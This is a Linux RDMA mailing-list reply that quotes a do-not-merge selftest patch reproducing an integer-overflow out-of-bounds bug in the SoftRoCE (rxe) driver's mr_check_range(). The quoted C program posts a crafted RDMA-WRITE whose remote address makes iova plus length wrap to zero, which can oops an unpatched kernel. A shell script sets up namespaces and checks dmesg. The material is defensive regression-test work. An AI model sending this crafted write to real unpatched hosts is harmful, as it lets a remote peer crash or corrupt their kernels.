Re: [PATCH net 2/2] DO-NOT-MERGE: selftest: add rxe mr_check_range() overflow reproducer
Zhu Yanjun <[email protected]> Sun, 2 Aug 2026 15:28:25 -0700
| Newsgroups | org.kernel.vger.linux-rdma |
|---|---|
| Message-ID | <[email protected]> |
在 2026/8/2 15:09, Zhu Yanjun 写道: > 在 2026/7/28 2:11, Gang Yan 写道: >> From: Gang Yan <[email protected]> >> >> This patch is for reproduce the OOB issue. >> >> Requirements: >> * Kernel built with ``CONFIG_INFINIBAND``, >> ``CONFIG_INFINIBAND_USER_ACCESS`` >> and ``CONFIG_RDMA_RXE`` (=m is fine). >> * ``rdma_rxe`` module loadable (``modprobe rdma_rxe``). >> * Userspace headers/libs to build the helper: ``libibverbs-dev``, >> ``librdmacm-dev``. >> * Root (the script builds a network namespace, a veth pair and two rxe >> devices). >> >> BUILD and RUN: >> cd tools/testing/selftests/rdma >> make >> # as root: >> ./rxe_mr_overflow.sh >> >> Expected results (Unpatched kernel (bug present) — FAIL): >> The kernel log shows the index WARNING immediately followed by an OOB >> Oops >> in the responder path:: >> >> WARNING: CPU: N PID: ... at rxe_mr_iova_to_index+0x.../0x... >> [rdma_rxe] >> ... >> RIP: 0010:rxe_mr_iova_to_index+0x.../0x... [rdma_rxe] >> Call Trace: >> <TASK> >> rxe_mr_copy+0x.../0x... [rdma_rxe] >> rxe_receiver+0x.../0x... [rdma_rxe] >> do_work+0x.../0x... [rdma_rxe] >> ... >> Oops: general protection fault, probably for non-canonical >> address 0x... >> Workqueue: rxe_wq do_work [rdma_rxe] >> RIP: 0010:rxe_mr_copy+0x.../0x... [rdma_rxe] >> Call Trace: >> <TASK> >> rxe_mr_copy+0x.../0x... [rdma_rxe] >> rxe_receiver+0x.../0x... [rdma_rxe] >> do_work+0x.../0x... [rdma_rxe] >> >> Assisted-by: Codex: GLM-5.2 >> Signed-off-by: Gang Yan <[email protected]> >> --- >> tools/testing/selftests/rdma/Makefile | 8 +- >> tools/testing/selftests/rdma/config | 2 + >> .../testing/selftests/rdma/rxe_mr_overflow.c | 187 ++++++++++++++++++ >> .../testing/selftests/rdma/rxe_mr_overflow.sh | 132 +++++++++++++ >> 4 files changed, 328 insertions(+), 1 deletion(-) >> create mode 100644 tools/testing/selftests/rdma/rxe_mr_overflow.c >> create mode 100644 tools/testing/selftests/rdma/rxe_mr_overflow.sh >> >> diff --git a/tools/testing/selftests/rdma/Makefile >> b/tools/testing/selftests/rdma/Makefile >> index 07af7f15c1bf..effeb8121d41 100644 >> --- a/tools/testing/selftests/rdma/Makefile >> +++ b/tools/testing/selftests/rdma/Makefile >> @@ -1,8 +1,14 @@ >> # SPDX-License-Identifier: GPL-2.0 >> -TEST_PROGS := rxe_rping_between_netns.sh \ >> +TEST_GEN_FILES := rxe_mr_overflow >> +TEST_PROGS := rxe_mr_overflow.sh \ >> + rxe_rping_between_netns.sh \ >> rxe_ipv6.sh \ >> rxe_socket_with_netns.sh \ >> rxe_test_NETDEV_UNREGISTER.sh \ >> rxe_sent_rcvd_bytes.sh >> include ../lib.mk >> + >> +# rxe_mr_overflow uses libibverbs / librdmacm >> +$(OUTPUT)/rxe_mr_overflow: CFLAGS += -O2 -Wall >> +$(OUTPUT)/rxe_mr_overflow: LDLIBS += -libverbs -lrdmacm >> diff --git a/tools/testing/selftests/rdma/config >> b/tools/testing/selftests/rdma/config >> index 4ffb814e253b..bc27ce3ec093 100644 >> --- a/tools/testing/selftests/rdma/config >> +++ b/tools/testing/selftests/rdma/config >> @@ -1,3 +1,5 @@ >> CONFIG_TUN >> CONFIG_VETH >> CONFIG_RDMA_RXE >> +CONFIG_INFINIBAND >> +CONFIG_INFINIBAND_USER_ACCESS >> diff --git a/tools/testing/selftests/rdma/rxe_mr_overflow.c >> b/tools/testing/selftests/rdma/rxe_mr_overflow.c >> new file mode 100644 >> index 000000000000..ccad930533ac >> --- /dev/null >> +++ b/tools/testing/selftests/rdma/rxe_mr_overflow.c >> @@ -0,0 +1,187 @@ >> +// SPDX-License-Identifier: GPL-2.0 >> +/* >> + * rxe_mr_overflow.c - trigger mr_check_range() iova overflow (OOB) >> + * >> + * Companion to rxe_mr_overflow.sh. The server registers a >> USER/MEM_REG MR >> + * and accepts an RDMA_CM connection, passing its rkey via private >> data. The >> + * client posts a single RDMA-WRITE whose remote_addr is chosen so that >> + * iova + length wraps to 0 in mr_check_range(): >> + * >> + * iova + length = 0xfffffffffffffff8 + 8 = 2^64 = 0 >> + * >> + * On an *unpatched* kernel this bypasses mr_check_range(), and the >> responder >> + * computes a huge index in rxe_mr_iova_to_index() (WARN_ON(idx >= >> nbuf)) and >> + * dereferences mr->page_info[huge] -> out-of-bounds access / oops. >> + * >> + * On a *patched* kernel mr_check_range() rejects the crafted iova >> and the >> + * client completion is IBV_WC_REM_ACCESS_ERR (remote access error). >> + * >> + * Build: see Makefile (needs libibverbs-dev / librdmacm-dev). >> + */ >> +#include <stdio.h> >> +#include <stdlib.h> >> +#include <string.h> >> +#include <unistd.h> >> +#include <stdint.h> >> +#include <arpa/inet.h> >> +#include <infiniband/verbs.h> >> +#include <rdma/rdma_cma.h> >> + >> +#define BAD_ADDR 0xfffffffffffffff8ULL /* iova + WR_LEN wraps >> to 0 */ >> +#define WR_LEN 8 >> +#define MR_LEN 4096 >> + >> +struct mr_info { >> + uint32_t rkey; >> + uint32_t pad; >> + uint64_t iova; >> +} __attribute__((packed)); >> + >> +static int wait_ev(struct rdma_event_channel *ec, struct >> rdma_cm_event **ev, >> + enum rdma_cm_event_type want) >> +{ >> + while (rdma_get_cm_event(ec, ev) == 0) { >> + if ((*ev)->event != want) { >> + fprintf(stderr, "unexpected event %s (want %s)\n", >> + rdma_event_str((*ev)->event), rdma_event_str(want)); >> + rdma_ack_cm_event(*ev); >> + return -1; >> + } >> + return 0; >> + } >> + perror("rdma_get_cm_event"); >> + return -1; >> +} >> + >> +static int run_server(const char *ip, int port) >> +{ >> + struct rdma_event_channel *ec = rdma_create_event_channel(); >> + struct rdma_cm_id *lid; >> + struct rdma_cm_event *ev; >> + >> + if (!ec) { perror("event_channel"); return 1; } >> + if (rdma_create_id(ec, &lid, NULL, RDMA_PS_TCP)) { >> perror("create_id"); return 1; } >> + >> + struct sockaddr_in sin = {0}; >> + sin.sin_family = AF_INET; >> + sin.sin_port = htons(port); >> + if (!inet_pton(AF_INET, ip, &sin.sin_addr)) { fprintf(stderr, >> "bad ip\n"); return 1; } >> + >> + if (rdma_bind_addr(lid, (struct sockaddr *)&sin)) { >> perror("bind_addr"); return 1; } >> + if (rdma_listen(lid, 1)) { perror("listen"); return 1; } >> + printf("[server] listen %s:%d dev=%s\n", ip, port, >> + lid->verbs ? ibv_get_device_name(lid->verbs->device) : "?"); >> + fflush(stdout); >> + >> + if (wait_ev(ec, &ev, RDMA_CM_EVENT_CONNECT_REQUEST)) return 1; >> + struct rdma_cm_id *id = ev->id; >> + >> + struct ibv_pd *pd = ibv_alloc_pd(id->verbs); >> + struct ibv_cq *cq = ibv_create_cq(id->verbs, 8, NULL, NULL, 0); >> + if (!pd || !cq) { perror("alloc_pd/create_cq"); return 1; } >> + void *buf = calloc(1, MR_LEN); >> + struct ibv_mr *mr = ibv_reg_mr(pd, buf, MR_LEN, >> + IBV_ACCESS_LOCAL_WRITE | IBV_ACCESS_REMOTE_WRITE); >> + if (!mr) { perror("reg_mr"); return 1; } >> + >> + struct ibv_qp_init_attr qa = {0}; >> + qa.send_cq = cq; qa.recv_cq = cq; qa.qp_type = IBV_QPT_RC; >> + qa.cap.max_send_wr = 4; qa.cap.max_recv_wr = 4; >> + qa.cap.max_send_sge = 2; qa.cap.max_recv_sge = 2; >> + if (rdma_create_qp(id, pd, &qa)) { perror("create_qp"); return 1; } >> + >> + struct mr_info info = { .rkey = mr->rkey, .iova = >> (uint64_t)(uintptr_t)buf }; >> + struct rdma_conn_param p = {0}; >> + p.private_data = &info; >> + p.private_data_len = sizeof(info); >> + p.initiator_depth = 1; >> + p.responder_resources = 1; >> + if (rdma_accept(id, &p)) { perror("accept"); return 1; } >> + rdma_ack_cm_event(ev); >> + printf("[server] accepted rkey=%#x iova=%#llx; waiting for >> client write\n", >> + mr->rkey, (unsigned long long)info.iova); >> + fflush(stdout); >> + >> + /* The OOB (if unpatched) fires here in the responder path. */ >> + sleep(5); >> + return 0; >> +} >> + >> +static int run_client(const char *ip, int port) >> +{ >> + struct rdma_event_channel *ec = rdma_create_event_channel(); >> + struct rdma_cm_id *id; >> + struct rdma_cm_event *ev; >> + >> + if (!ec) { perror("event_channel"); return 1; } >> + if (rdma_create_id(ec, &id, NULL, RDMA_PS_TCP)) { >> perror("create_id"); return 1; } >> + >> + struct sockaddr_in sin = {0}; >> + sin.sin_family = AF_INET; sin.sin_port = htons(port); >> + if (!inet_pton(AF_INET, ip, &sin.sin_addr)) { fprintf(stderr, >> "bad ip\n"); return 1; } >> + >> + if (rdma_resolve_addr(id, NULL, (struct sockaddr *)&sin, 5000)) >> { perror("resolve_addr"); return 1; } >> + if (wait_ev(ec, &ev, RDMA_CM_EVENT_ADDR_RESOLVED)) return 1; >> + rdma_ack_cm_event(ev); >> + if (rdma_resolve_route(id, 5000)) { perror("resolve_route"); >> return 1; } >> + if (wait_ev(ec, &ev, RDMA_CM_EVENT_ROUTE_RESOLVED)) return 1; >> + rdma_ack_cm_event(ev); >> + >> + struct ibv_pd *pd = ibv_alloc_pd(id->verbs); >> + struct ibv_cq *cq = ibv_create_cq(id->verbs, 8, NULL, NULL, 0); >> + void *buf = calloc(1, MR_LEN); >> + struct ibv_mr *mr = ibv_reg_mr(pd, buf, MR_LEN, >> IBV_ACCESS_LOCAL_WRITE); >> + struct ibv_qp_init_attr qa = {0}; >> + qa.send_cq = cq; qa.recv_cq = cq; qa.qp_type = IBV_QPT_RC; >> + qa.cap.max_send_wr = 4; qa.cap.max_recv_wr = 4; >> + qa.cap.max_send_sge = 2; qa.cap.max_recv_sge = 2; >> + if (rdma_create_qp(id, pd, &qa)) { perror("create_qp"); return 1; } >> + >> + struct rdma_conn_param p = {0}; >> + p.initiator_depth = 1; p.responder_resources = 1; p.retry_count >> = 3; >> + if (rdma_connect(id, &p)) { perror("connect"); return 1; } >> + if (wait_ev(ec, &ev, RDMA_CM_EVENT_ESTABLISHED)) return 1; >> + >> + struct mr_info info = {0}; >> + if (ev->param.conn.private_data_len >= (int)sizeof(info)) >> + memcpy(&info, ev->param.conn.private_data, sizeof(info)); >> + rdma_ack_cm_event(ev); >> + >> + /* The malicious RDMA-WRITE: remote_addr makes iova+length wrap. */ >> + struct ibv_sge sge = { .addr = (uintptr_t)buf, .length = WR_LEN, >> .lkey = mr->lkey }; >> + struct ibv_send_wr wr = {0}, *bad; >> + wr.wr_id = 0xdead; >> + wr.opcode = IBV_WR_RDMA_WRITE; >> + wr.send_flags = IBV_SEND_SIGNALED; >> + wr.sg_list = &sge; >> + wr.num_sge = 1; >> + wr.wr.rdma.remote_addr = BAD_ADDR; >> + wr.wr.rdma.rkey = info.rkey; >> + printf("[client] post RDMA-WRITE remote_addr=%#llx len=%d >> rkey=%#x\n", >> + (unsigned long long)BAD_ADDR, WR_LEN, info.rkey); >> + fflush(stdout); >> + ibv_post_send(id->qp, &wr, &bad); >> + >> + struct ibv_wc wc; >> + int n, tries = 5000; >> + while (tries-- > 0 && (n = ibv_poll_cq(cq, 1, &wc)) == 0) >> + usleep(1000); >> + if (n > 0) >> + printf("[client] completion status=%d (%s)\n", >> + wc.status, ibv_wc_status_str(wc.status)); >> + else >> + printf("[client] no completion (responder likely crashed)\n"); >> + sleep(2); >> + return 0; >> +} >> + >> +int main(int argc, char **argv) >> +{ >> + if (argc == 3) /* server <ip> <port> */ >> + return run_server(argv[1], atoi(argv[2])); >> + if (argc == 4 && !strcmp(argv[1], "-c")) /* -c <ip> <port> */ >> + return run_client(argv[2], atoi(argv[3])); >> + fprintf(stderr, "Usage:\n server: %s <ip> <port>\n client: %s >> -c <ip> <port>\n", >> + argv[0], argv[0]); >> + return 1; >> +} >> diff --git a/tools/testing/selftests/rdma/rxe_mr_overflow.sh >> b/tools/testing/selftests/rdma/rxe_mr_overflow.sh >> new file mode 100644 >> index 000000000000..2590e41be99b >> --- /dev/null >> +++ b/tools/testing/selftests/rdma/rxe_mr_overflow.sh >> @@ -0,0 +1,132 @@ >> +#!/bin/bash >> +# SPDX-License-Identifier: GPL-2.0 >> +# >> +# Regression test for the mr_check_range() iova overflow in SoftRoCE >> (rxe). >> +# >> +# A remote peer can craft an RDMA-WRITE whose RETH makes iova + >> length wrap >> +# to 0, bypassing the old >> +# >> +# if (iova + length > mr->ibmr.iova + mr->ibmr.length) >> +# >> +# range check in mr_check_range(). The responder then derives a huge >> page >> +# index in rxe_mr_iova_to_index() (only WARN_ON-guarded) and >> dereferences >> +# mr->page_info[huge] -> out-of-bounds read/write / kernel oops, >> triggerable >> +# by an unauthenticated remote peer. >> +# >> +# Fixed by rewriting the check in overflow-safe form: >> +# >> +# if (iova < mr->ibmr.iova || >> +# length > mr->ibmr.length || >> +# iova - mr->ibmr.iova > mr->ibmr.length - length) >> +# >> +# Topology: a veth pair across a network namespace, one rxe device >> on each >> +# end. The server (ns) registers a USER MR and accepts an RDMA_CM >> +# connection, passing its rkey/iova in the private data. The client >> (host) >> +# posts one RDMA-WRITE with remote_addr = 0xfffffffffffffff8, len = 8. >> +# >> +# - Patched kernel: PASS (mr_check_range() rejects the crafted >> iova; >> +# the client completion is >> IBV_WC_REM_ACCESS_ERR; >> +# no kernel warning/oops in dmesg) >> +# - Unpatched kernel: FAIL (WARN_ON in rxe_mr_iova_to_index >> followed by >> +# an OOB page fault / oops in rxe_mr_copy) >> + > Thanks a lot. When I run rdma selftests. I got the following: > " > # Warning: file rxe_mr_overflow.sh is not executable > " > You need to make rxe_mr_overflow.sh executable. After this testcase is run, please remove this bin file rxe_mr_overflow in tools/testing/selftests/rdma. Thanks a lot. Zhu Yanjun > > And please also check and try to fix some warnings from sashiko. > > Thanks a lot. > Zhu Yanjun > >> +NS="rxe_mrovf" >> +VETH_NS="vmo-a" >> +VETH_HOST="vmo-b" >> +IP_NS="1.1.1.1" >> +IP_HOST="1.1.1.2" >> +PORT=4792 >> +BIN="$(dirname "$(readlink -f "$0")")/rxe_mr_overflow" >> + >> +source "$(dirname "$0")/../kselftest/ktap_helpers.sh" >> + >> +SRV= >> + >> +# Remove the topology this script creates. Idempotent: safe to call >> even when >> +# some of the resources no longer exist (e.g. partial setup, prior >> abort). >> +rxe_teardown() { >> + rdma link del rxe1 2>/dev/null >> + ip netns exec "$NS" rdma link del rxe0 2>/dev/null >> + ip link delete "$VETH_HOST" 2>/dev/null >> + ip netns del "$NS" 2>/dev/null >> +} >> + >> +cleanup() { >> + trap '' INT TERM EXIT # guard against re-entry >> + # Kill the server first so the client does not block on a dead >> peer. >> + [ -n "$SRV" ] && kill "$SRV" 2>/dev/null >> + wait "$SRV" 2>/dev/null >> + rxe_teardown >> + modprobe -r rdma_rxe 2>/dev/null >> +} >> +# Cover normal exit, Ctrl+C (SIGINT) and kill (SIGTERM) alike. >> +trap cleanup INT TERM EXIT >> + >> +# Tear down any leftover topology from a previous aborted run >> (SIGINT, kill >> +# -9, guest crash, ...) so this script is always re-runnable instead of >> +# failing on "RTNETLINK answers: File exists". >> +rxe_teardown >> + >> +# --- Prerequisites --- >> +if [ "$EUID" -ne 0 ]; then >> + ktap_print_header >> + ktap_skip_all "needs root" >> + exit "$KSFT_SKIP" >> +fi >> +if ! modinfo rdma_rxe >/dev/null 2>&1; then >> + ktap_print_header >> + ktap_skip_all "rdma_rxe module not found" >> + exit "$KSFT_SKIP" >> +fi >> +if [ ! -x "$BIN" ]; then >> + ktap_print_header >> + ktap_skip_all "$BIN not built (needs libibverbs-dev / >> librdmacm-dev)" >> + exit "$KSFT_SKIP" >> +fi >> + >> +modprobe rdma_rxe >/dev/null 2>&1 >> + >> +# --- Topology: veth pair across a netns, one rxe device on each end >> --- >> +ip netns add "$NS" >> +ip link add "$VETH_NS" type veth peer name "$VETH_HOST" >> +ip link set "$VETH_NS" netns "$NS" >> + >> +ip netns exec "$NS" ip addr add "$IP_NS/24" dev "$VETH_NS" >> +ip netns exec "$NS" ip link set "$VETH_NS" up >> +ip netns exec "$NS" ip link set lo up >> +ip addr add "$IP_HOST/24" dev "$VETH_HOST" >> +ip link set "$VETH_HOST" up >> + >> +ip netns exec "$NS" rdma link add rxe0 type rxe netdev "$VETH_NS" >> +rdma link add rxe1 type rxe netdev "$VETH_HOST" >> + >> +if ! ping -c 2 -W 1 "$IP_NS" >/dev/null 2>&1; then >> + ktap_print_header >> + ktap_skip_all "no connectivity between host and netns" >> + exit "$KSFT_SKIP" >> +fi >> + >> +# Only look at warnings produced by this run. >> +dmesg -C >/dev/null 2>&1 >> + >> +# --- Run: server in the netns, client on the host --- >> +# On an unpatched kernel the crafted WRITE can wedge the responder; >> wrap both >> +# sides in timeout() so the script always reaches a verdict and runs >> cleanup >> +# instead of hanging on a stuck peer. >> +ktap_print_header >> +ktap_set_plan 1 >> + >> +ip netns exec "$NS" timeout 30 "$BIN" "$IP_NS" "$PORT" >/dev/null >> 2>&1 & >> +SRV=$! >> +sleep 2 >> +timeout 30 "$BIN" -c "$IP_NS" "$PORT" >/dev/null 2>&1 >> +wait "$SRV" 2>/dev/null >> + >> +# --- Verdict: any rxe MR-range warning / OOB means the kernel is >> unpatched --- >> +if dmesg 2>/dev/null | grep -qE >> "rxe_mr_iova_to_index|mr_check_range|BUG:.*rxe_mr_copy|KASAN:.*rxe_mr"; >> then >> + ktap_test_fail "mr_check_range() iova overflow (UNPATCHED): >> OOB/WARN in dmesg" >> +else >> + ktap_test_pass "mr_check_range() rejected crafted iova (patched)" >> +fi >> + >> +ktap_finished > -- Best Regards, Yanjun.Zhu